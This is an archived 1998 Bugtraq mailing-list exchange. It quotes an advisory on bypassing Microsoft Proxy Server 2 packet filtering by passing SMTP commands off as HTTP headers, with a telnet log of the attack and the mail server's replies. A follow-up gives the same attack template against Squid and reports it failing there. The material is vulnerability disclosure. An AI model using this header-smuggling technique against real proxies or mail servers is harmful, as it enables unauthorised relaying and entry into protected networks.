As far as I can tell, Squid is not vulnerable to this style exploit (to a
point). I was unable to pass a ^J through an HTTP header to get something on
it's own line (required for SMTP "." and anything else which will not allow
:'s).
Can anyone confirm this? Standard attack would look like this:
# telnet squid 3128
GET http://mail.yourhost.com:25/ HTTP/1.0
helo yahoo.com :
mail from: someone@yahoo.com
rcpt to: someone@yourhost.com
data :
:^J.^J
There is a similar gopher attack, however gopher is probably disabled on
everyone's Squid proxy :)
Jordan
-- Jordan Mendelson : http://jordy.wserv.com Web Services, Inc. : http://www.wserv.com -----Original Message----- From: Bugtraq List [mailto:BUGTRAQ@netspace.org] On Behalf Of Mnemonix Sent: Wednesday, October 07, 1998 2:11 AM To: BUGTRAQ@netspace.org Subject: WARNING: By-passing MS Proxy packet filtering Whilst playing around with Microsoft's Proxy Server 2, I came across an interesting "feature" that could allow someone to by-pass packet filtering if enabled. The essence of the "exploit" is to connect to a remote host on a given port - in the example provided I have used the SMTP port (25) - through the Web Proxy Service. What you attempt to do is disguise service-specific commands as HTTP headers. Below is a log of a telnet session where I've telnetted to the Web Proxy Service, made a GET request and passed off the SMTP commands as HTTP headers : ------------------------------------------8<-------------------------------- ---------- GET http://smtpmail.globalnet.co.uk:25/ HTTP/1.0 mail from: me@here.com rcpt to: mnemonix@globalnet.co.uk data : Subject: This is the Subject Line : This is the body of the message. To get here do a Ctrl+J. To place a single dot on a line do another Ctrl+J . 220 sand2.global.net.uk ESMTP Exim 1.92 #1 Wed, 7 Oct 1998 06:51:37 +0100 500 Command unrecognized 500 Command unrecognized 500 Command unrecognized 250 <me@here.com> is syntactically correct 250 <mnemonix@globalnet.co.uk> is syntactically correct 354 Enter message, ending with "." on a line by itself 250 OK id=0zQmVd-0007md-00 500 Command unrecognized 500 Command unrecognized ------------------------------------------8<-------------------------------- --------- If the packet filter only allows incoming HTTP requests and the Web-Proxy Service gives Everybody access this could be used to gain entry to the "protected" network. This was tested on NT Server 4.0, Service Pack 3 with important hotfixes, IIS 3.0 and MS Proxy 2.0 l8r Mnemonix http://www.diligence.co.uk/ http://www.infowar.co.uk/mnemonixReceived on Fri Oct 09 1998 - 15:56:32 MDT
This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:42:24 MST